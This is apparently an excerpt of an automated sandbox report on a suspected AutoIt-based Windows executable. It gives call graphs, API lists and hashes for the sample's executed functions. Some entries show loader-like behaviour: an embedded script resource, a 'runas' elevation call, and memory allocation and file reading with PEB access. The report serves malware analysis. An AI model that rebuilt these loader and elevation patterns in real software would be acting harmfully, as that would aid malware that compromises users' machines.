97711->97727 97712 d6e551 timeGetTime 97712->97727 97713 da1dda timeGetTime 97763 d6e300 23 API calls 97713->97763 97716->97703 97716->97704 97716->97706 97716->97707 97716->97708 97716->97709 97716->97710 97716->97711 97716->97713 97721 d5d9d5 97716->97721 97730 d5ec40 235 API calls 97716->97730 97731 d61310 235 API calls 97716->97731 97732 d5bf40 235 API calls 97716->97732 97734 d5dfd0 97716->97734 97757 d6edf6 97716->97757 97762 d5dd50 235 API calls 97716->97762 97764 dc3a2a 23 API calls 97716->97764 97765 dc359c 82 API calls __wsopen_s 97716->97765 97717 da2c0b GetExitCodeProcess 97718 da2c21 WaitForSingleObject 97717->97718 97719 da2c37 CloseHandle 97717->97719 97718->97716 97718->97719 97719->97727 97720 da2a31 97720->97721 97722 de29bf GetForegroundWindow 97722->97727 97724 da2ca9 Sleep 97724->97716 97727->97712 97727->97716 97727->97717 97727->97720 97727->97721 97727->97722 97727->97724 97766 dd5658 23 API calls 97727->97766 97767 dbe97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97727->97767 97768 dbd4dc 47 API calls 97727->97768 97730->97716 97731->97716 97732->97716 97735 d5e010 97734->97735 97751 d5e0dc messages 97735->97751 97771 d70242 5 API calls __Init_thread_wait 97735->97771 97738 da2fca 97740 d5a961 22 API calls 97738->97740 97738->97751 97739 d5a961 22 API calls 97739->97751 97741 da2fe4 97740->97741 97772 d700a3 29 API calls __onexit 97741->97772 97745 da2fee 97773 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97745->97773 97748 d5ec40 235 API calls 97748->97751 97750 d5a8c7 22 API calls 97750->97751 97751->97739 97751->97748 97751->97750 97752 d5e3e1 97751->97752 97753 d604f0 22 API calls 97751->97753 97754 dc359c 82 API calls 97751->97754 97769 d5a81b 41 API calls 97751->97769 97770 d6a308 235 API calls 97751->97770 97774 d70242 5 API calls __Init_thread_wait 97751->97774 97775 d700a3 29 API calls __onexit 97751->97775 97776 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97751->97776 97777 dd47d4 235 API calls 97751->97777 97778 dd68c1 235 API calls 97751->97778 97752->97716 97753->97751 97754->97751 97758 d6ee09 97757->97758 97760 d6ee12 97757->97760 97758->97716 97759 d6ee36 IsDialogMessageW 97759->97758 97759->97760 97760->97758 97760->97759 97761 daefaf GetClassLongW 97760->97761 97761->97759 97761->97760 97762->97716 97763->97716 97764->97716 97765->97716 97766->97727 97767->97727 97768->97727 97769->97751 97770->97751 97771->97738 97772->97745 97773->97751 97774->97751 97775->97751 97776->97751 97777->97751 97778->97751 97779 d88402 97784 d881be 97779->97784 97783 d8842a 97785 d881ef try_get_first_available_module 97784->97785 97792 d88338 97785->97792 97799 d78e0b 40 API calls 2 library calls 97785->97799 97787 d883ee 97803 d827ec 26 API calls __wsopen_s 97787->97803 97789 d88343 97789->97783 97796 d90984 97789->97796 97791 d8838c 97791->97792 97800 d78e0b 40 API calls 2 library calls 97791->97800 97792->97789 97802 d7f2d9 20 API calls __dosmaperr 97792->97802 97794 d883ab 97794->97792 97801 d78e0b 40 API calls 2 library calls 97794->97801 97804 d90081 97796->97804 97798 d9099f 97798->97783 97799->97791 97800->97794 97801->97792 97802->97787 97803->97789 97807 d9008d CallCatchBlock 97804->97807 97805 d9009b 97861 d7f2d9 20 API calls __dosmaperr 97805->97861 97807->97805 97809 d900d4 97807->97809 97808 d900a0 97862 d827ec 26 API calls __wsopen_s 97808->97862 97815 d9065b 97809->97815 97814 d900aa __wsopen_s 97814->97798 97816 d90678 97815->97816 97817 d9068d 97816->97817 97818 d906a6 97816->97818 97878 d7f2c6 20 API calls __dosmaperr 97817->97878 97864 d85221 97818->97864 97821 d90692 97879 d7f2d9 20 API calls __dosmaperr 97821->97879 97822 d906ab 97823 d906cb 97822->97823 97824 d906b4 97822->97824 97877 d9039a CreateFileW 97823->97877 97880 d7f2c6 20 API calls __dosmaperr 97824->97880 97828 d906b9 97881 d7f2d9 20 API calls __dosmaperr 97828->97881 97830 d90781 GetFileType 97832 d9078c GetLastError 97830->97832 97833 d907d3 97830->97833 97831 d90756 GetLastError 97883 d7f2a3 20 API calls 2 library calls 97831->97883 97884 d7f2a3 20 API calls 2 library calls 97832->97884 97886 d8516a 21 API calls 3 library calls 97833->97886 97835 d90704 97835->97830 97835->97831 97882 d9039a CreateFileW 97835->97882 97837 d9079a CloseHandle 97837->97821 97839 d907c3 97837->97839 97885 d7f2d9 20 API calls __dosmaperr 97839->97885 97841 d90749 97841->97830 97841->97831 97843 d907f4 97848 d90840 97843->97848 97887 d905ab 72 API calls 4 library calls 97843->97887 97844 d907c8 97844->97821 97847 d90866 97849 d9086d 97847->97849 97850 d9087e 97847->97850 97848->97849 97888 d9014d 72 API calls 4 library calls 97848->97888 97851 d886ae __wsopen_s 29 API calls 97849->97851 97852 d900f8 97850->97852 97853 d908fc CloseHandle 97850->97853 97851->97852 97863 d90121 LeaveCriticalSection __wsopen_s 97852->97863 97889 d9039a CreateFileW 97853->97889 97855 d90927 97856 d90931 GetLastError 97855->97856 97857 d9095d 97855->97857 97890 d7f2a3 20 API calls 2 library calls 97856->97890 97857->97852 97859 d9093d 97891 d85333 21 API calls 3 library calls 97859->97891 97861->97808 97862->97814 97863->97814 97865 d8522d CallCatchBlock 97864->97865 97892 d82f5e EnterCriticalSection 97865->97892 97867 d85234 97869 d85259 97867->97869 97873 d852c7 EnterCriticalSection 97867->97873 97875 d8527b 97867->97875 97871 d85000 __wsopen_s 21 API calls 97869->97871 97870 d852a4 __wsopen_s 97870->97822 97872 d8525e 97871->97872 97872->97875 97896 d85147 EnterCriticalSection 97872->97896 97874 d852d4 LeaveCriticalSection 97873->97874 97873->97875 97874->97867 97893 d8532a 97875->97893 97877->97835 97878->97821 97879->97852 97880->97828 97881->97821 97882->97841 97883->97821 97884->97837 97885->97844 97886->97843 97887->97848 97888->97847 97889->97855 97890->97859 97891->97857 97892->97867 97897 d82fa6 LeaveCriticalSection 97893->97897 97895 d85331 97895->97870 97896->97875 97897->97895 97898 da3a41 97902 dc10c0 97898->97902 97900 da3a4c 97901 dc10c0 53 API calls 97900->97901 97901->97900 97904 dc10cd 97902->97904 97909 dc10fa 97902->97909 97903 dc10fc 97914 d6fa11 53 API calls 97903->97914 97904->97903 97906 dc1101 97904->97906 97904->97909 97911 dc10f4 97904->97911 97907 d57510 53 API calls 97906->97907 97908 dc1108 97907->97908 97910 d56350 22 API calls 97908->97910 97909->97900 97910->97909 97913 d5b270 39 API calls 97911->97913 97913->97909 97914->97906 97915 d92ba5 97916 d52b25 97915->97916 97917 d92baf 97915->97917 97943 d52b83 7 API calls 97916->97943 97919 d53a5a 24 API calls 97917->97919 97921 d92bb8 97919->97921 97923 d59cb3 22 API calls 97921->97923 97924 d92bc6 97923->97924 97926 d92bce 97924->97926 97927 d92bf5 97924->97927 97925 d52b2f 97928 d53837 49 API calls 97925->97928 97935 d52b44 97925->97935 97929 d533c6 22 API calls 97926->97929 97930 d533c6 22 API calls 97927->97930 97928->97935 97931 d92bd9 97929->97931 97932 d92bf1 GetForegroundWindow ShellExecuteW 97930->97932 97933 d56350 22 API calls 97931->97933 97939 d92c26 97932->97939 97937 d92be7 97933->97937 97934 d52b5f 97941 d52b66 SetCurrentDirectoryW 97934->97941 97935->97934 97947 d530f2 Shell_NotifyIconW ___scrt_fastfail 97935->97947 97940 d533c6 22 API calls 97937->97940 97939->97934 97940->97932 97942 d52b7a 97941->97942 97948 d52cd4 7 API calls 97943->97948 97945 d52b2a 97946 d52c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97945->97946 97946->97925 97947->97934 97948->97945 97949 15d80e0 97963 15d5d30 97949->97963 97951 15d81bb 97966 15d7fd0 97951->97966 97953 15d81e4 CreateFileW 97955 15d8238 97953->97955 97956 15d8233 97953->97956 97955->97956 97957 15d824f VirtualAlloc 97955->97957 97957->97956 97958 15d8270 ReadFile 97957->97958 97958->97956 97959 15d828b 97958->97959 97960 15d6da0 12 API calls 97959->97960 97961 15d82a5 97960->97961 97962 15d6fd0 GetPEB GetPEB 97961->97962 97962->97956 97969 15d9200 GetPEB 97963->97969 97965 15d63bb 97965->97951 97967 15d7fd9 Sleep 97966->97967 97968 15d7fe7 97967->97968 97970 15d922a 97969->97970 97970->97965

                                                                                                            Executed Functions

                                                                                                            Function 00D542DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 234 d542de-d5434d call d5a961 GetVersionExW call d56b57 239 d54353 234->239 240 d93617-d9362a 234->240 241 d54355-d54357 239->241 242 d9362b-d9362f 240->242 243 d5435d-d543bc call d593b2 call d537a0 241->243 244 d93656 241->244 245 d93631 242->245 246 d93632-d9363e 242->246 262 d937df-d937e6 243->262 263 d543c2-d543c4 243->263 249 d9365d-d93660 244->249 245->246 246->242 248 d93640-d93642 246->248 248->241 251 d93648-d9364f 248->251 252 d5441b-d54435 GetCurrentProcess IsWow64Process 249->252 253 d93666-d936a8 249->253 251->240 255 d93651 251->255 258 d54494-d5449a 252->258 259 d54437 252->259 253->252 256 d936ae-d936b1 253->256 255->244 260 d936db-d936e5 256->260 261 d936b3-d936bd 256->261 264 d5443d-d54449 258->264 259->264 268 d936f8-d93702 260->268 269 d936e7-d936f3 260->269 265 d936ca-d936d6 261->265 266 d936bf-d936c5 261->266 270 d937e8 262->270 271 d93806-d93809 262->271 263->249 267 d543ca-d543dd 263->267 272 d5444f-d5445e LoadLibraryA 264->272 273 d93824-d93828 GetSystemInfo 264->273 265->252 266->252 276 d543e3-d543e5 267->276 277 d93726-d9372f 267->277 279 d93715-d93721 268->279 280 d93704-d93710 268->280 269->252 278 d937ee 270->278 281 d9380b-d9381a 271->281 282 d937f4-d937fc 271->282 274 d54460-d5446e GetProcAddress 272->274 275 d5449c-d544a6 GetSystemInfo 272->275 274->275 283 d54470-d54474 GetNativeSystemInfo 274->283 284 d54476-d54478 275->284 285 d9374d-d93762 276->285 286 d543eb-d543ee 276->286 287 d9373c-d93748 277->287 288 d93731-d93737 277->288 278->282 279->252 280->252 281->278 289 d9381c-d93822 281->289 282->271 283->284 292 d54481-d54493 284->292 293 d5447a-d5447b FreeLibrary 284->293 290 d9376f-d9377b 285->290 291 d93764-d9376a 285->291 294 d543f4-d5440f 286->294 295 d93791-d93794 286->295 287->252 288->252 289->282 290->252 291->252 293->292 297 d54415 294->297 298 d93780-d9378c 294->298 295->252 296 d9379a-d937c1 295->296 299 d937ce-d937da 296->299 300 d937c3-d937c9 296->300 297->252 298->252 299->252 300->252
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00D5430D
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • GetCurrentProcess.KERNEL32(?,00DECB64,00000000,?,?), ref: 00D54422
                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D54429
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D54454
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D54466
                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D54474
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5447B
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00D544A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                            • Opcode ID: ab2b58895554441e73960188c610eeaa78de622be22f5e9abd2e0ffe8a097e64
                                                                                                            • Instruction ID: 65fa26d31a7dfbec333d4f55964564686a33030b8b4c98edb16cf0350855f22f
                                                                                                            • Opcode Fuzzy Hash: ab2b58895554441e73960188c610eeaa78de622be22f5e9abd2e0ffe8a097e64
                                                                                                            • Instruction Fuzzy Hash: 19A1936291A3C0DFCF31CB6B7C851957FE66B76305B0A54E9D881B7A21D260474ECB32
                                                                                                            Function 00D542A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1147 d542a2-d542ba CreateStreamOnHGlobal 1148 d542bc-d542d3 FindResourceExW 1147->1148 1149 d542da-d542dd 1147->1149 1150 d935ba-d935c9 LoadResource 1148->1150 1151 d542d9 1148->1151 1150->1151 1152 d935cf-d935dd SizeofResource 1150->1152 1151->1149 1152->1151 1153 d935e3-d935ee LockResource 1152->1153 1153->1151 1154 d935f4-d93612 1153->1154 1154->1151
                                                                                                            APIs
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00D550AA,?,?,00000000,00000000), ref: 00D542B2
                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D550AA,?,?,00000000,00000000), ref: 00D542C9
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20), ref: 00D935BE
                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20), ref: 00D935D3
                                                                                                            • LockResource.KERNEL32(00D550AA,?,?,00D550AA,?,?,00000000,00000000,?,?,?,?,?,?,00D54F20,?), ref: 00D935E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                            • String ID: SCRIPT
                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                            • Opcode ID: d4095d443dc466c00430a6d3e479477fb60c61d673de92cec9c1cdc6eb14b7c0
                                                                                                            • Instruction ID: 0521fb628118ff2c1ad0601c37057359c0d45999e93f24e77fa1b643c752c851
                                                                                                            • Opcode Fuzzy Hash: d4095d443dc466c00430a6d3e479477fb60c61d673de92cec9c1cdc6eb14b7c0
                                                                                                            • Instruction Fuzzy Hash: E211AC70201301BFDB219B65DC88F277BB9EBC5B56F144169B902CA250DB71D8068631
                                                                                                            Function 00D92BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D52B6B
                                                                                                              • Part of subcall function 00D53A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E21418,?,00D52E7F,?,?,?,00000000), ref: 00D53A78
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,00E12224), ref: 00D92C10
                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?,00E12224), ref: 00D92C17
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                            • String ID: runas
                                                                                                            • API String ID: 448630720-4000483414
                                                                                                            • Opcode ID: 7984f85fd607de373ae74d1d53d7ce87a7ccf5f6f0aacb9cf509d699cfb370e1
                                                                                                            • Instruction ID: 9ae20a3e24550b563274ddbf661320aa164bfe2c2ccf112f1d0f891ad759e0e2
                                                                                                            • Opcode Fuzzy Hash: 7984f85fd607de373ae74d1d53d7ce87a7ccf5f6f0aacb9cf509d699cfb370e1
                                                                                                            • Instruction Fuzzy Hash: 4311A531204345AACF14FF64D8929BEBBA5DFE5342F48142DBC96560A2DF209A4EC732
                                                                                                            Function 00DBDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,00D95222), ref: 00DBDBCE
                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00DBDBDD
                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00DBDBEE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBDBFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2695905019-0
                                                                                                            • Opcode ID: 1baa4367c4f330d4f170c36ffaf0c49244d4c8df83fd5bfce135cd71483bec3c
                                                                                                            • Instruction ID: add521370ba934f8851242a2742acdfdd3385695d58108b1238a6ec521d3ab99
                                                                                                            • Opcode Fuzzy Hash: 1baa4367c4f330d4f170c36ffaf0c49244d4c8df83fd5bfce135cd71483bec3c
                                                                                                            • Instruction Fuzzy Hash: E8F0A73082061097C2207B789C4E4AA3B7D9E05334B144706F976C11E0FBB05D5585B9
                                                                                                            Function 00D5BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper
                                                                                                            • String ID: p#
                                                                                                            • API String ID: 3964851224-4182048217
                                                                                                            • Opcode ID: c37688a0274b249f90205ba0ea4f986bee830acdf9b9cafc294ee6e3fc0dc23b
                                                                                                            • Instruction ID: 457e6d824d09a3c3e6a2e6d08afd70bcccab43829aa395938f192160541d2452
                                                                                                            • Opcode Fuzzy Hash: c37688a0274b249f90205ba0ea4f986bee830acdf9b9cafc294ee6e3fc0dc23b
                                                                                                            • Instruction Fuzzy Hash: 6CA23A706183019FDB14DF18C480B2ABBE1FF89305F18995DED999B252D771E849CFA2
                                                                                                            Function 00D5D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 00D5D807
                                                                                                            • timeGetTime.WINMM ref: 00D5DA07
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB28
                                                                                                            • TranslateMessage.USER32(?), ref: 00D5DB7B
                                                                                                            • DispatchMessageW.USER32(?), ref: 00D5DB89
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB9F
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00D5DBB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2189390790-0
                                                                                                            • Opcode ID: 2530073c91bab1d3236a4375dad7b31de518cb1d6401bad7fa600b2d866f41ed
                                                                                                            • Instruction ID: 96d0820e80b99fb3d7dbf17c34787495d1dbca15a68e3165cf217804087fdc7b
                                                                                                            • Opcode Fuzzy Hash: 2530073c91bab1d3236a4375dad7b31de518cb1d6401bad7fa600b2d866f41ed
                                                                                                            • Instruction Fuzzy Hash: 6542BE706083419FDB38DF25C884BAAB7A2FF56315F184559EC96872A1D770E848CFB2
                                                                                                            Function 00D52CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D52D07
                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00D52D31
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D52D42
                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00D52D5F
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D52D6F
                                                                                                            • LoadIconW.USER32(000000A9), ref: 00D52D85
                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D52D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                            • Opcode ID: a5525af24dba7483e02bd5c9d2a3efd381b26ad604692263adacf60a95dcaafe
                                                                                                            • Instruction ID: 20ac02da62b8f9c4bbf37f3a60f957d2afa1cd43264c75e96c33516da759ae25
                                                                                                            • Opcode Fuzzy Hash: a5525af24dba7483e02bd5c9d2a3efd381b26ad604692263adacf60a95dcaafe
                                                                                                            • Instruction Fuzzy Hash: 1021E4B1911348AFDB10EFA5E889B9DBBB4FB08700F10515AF511FA3A0D7B10646CFA1
                                                                                                            Function 00D9065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 302 d9065b-d9068b call d9042f 305 d9068d-d90698 call d7f2c6 302->305 306 d906a6-d906b2 call d85221 302->306 311 d9069a-d906a1 call d7f2d9 305->311 312 d906cb-d90714 call d9039a 306->312 313 d906b4-d906c9 call d7f2c6 call d7f2d9 306->313 323 d9097d-d90983 311->323 321 d90781-d9078a GetFileType 312->321 322 d90716-d9071f 312->322 313->311 327 d9078c-d907bd GetLastError call d7f2a3 CloseHandle 321->327 328 d907d3-d907d6 321->328 325 d90721-d90725 322->325 326 d90756-d9077c GetLastError call d7f2a3 322->326 325->326 332 d90727-d90754 call d9039a 325->332 326->311 327->311 339 d907c3-d907ce call d7f2d9 327->339 330 d907d8-d907dd 328->330 331 d907df-d907e5 328->331 335 d907e9-d90837 call d8516a 330->335 331->335 336 d907e7 331->336 332->321 332->326 345 d90839-d90845 call d905ab 335->345 346 d90847-d9086b call d9014d 335->346 336->335 339->311 345->346 353 d9086f-d90879 call d886ae 345->353 351 d9086d 346->351 352 d9087e-d908c1 346->352 351->353 355 d908c3-d908c7 352->355 356 d908e2-d908f0 352->356 353->323 355->356 358 d908c9-d908dd 355->358 359 d9097b 356->359 360 d908f6-d908fa 356->360 358->356 359->323 360->359 361 d908fc-d9092f CloseHandle call d9039a 360->361 364 d90931-d9095d GetLastError call d7f2a3 call d85333 361->364 365 d90963-d90977 361->365 364->365 365->359
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D9039A: CreateFileW.KERNELBASE(00000000,00000000,?,00D90704,?,?,00000000,?,00D90704,00000000,0000000C), ref: 00D903B7
                                                                                                            • GetLastError.KERNEL32 ref: 00D9076F
                                                                                                            • __dosmaperr.LIBCMT ref: 00D90776
                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00D90782
                                                                                                            • GetLastError.KERNEL32 ref: 00D9078C
                                                                                                            • __dosmaperr.LIBCMT ref: 00D90795
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00D907B5
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00D908FF
                                                                                                            • GetLastError.KERNEL32 ref: 00D90931
                                                                                                            • __dosmaperr.LIBCMT ref: 00D90938
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
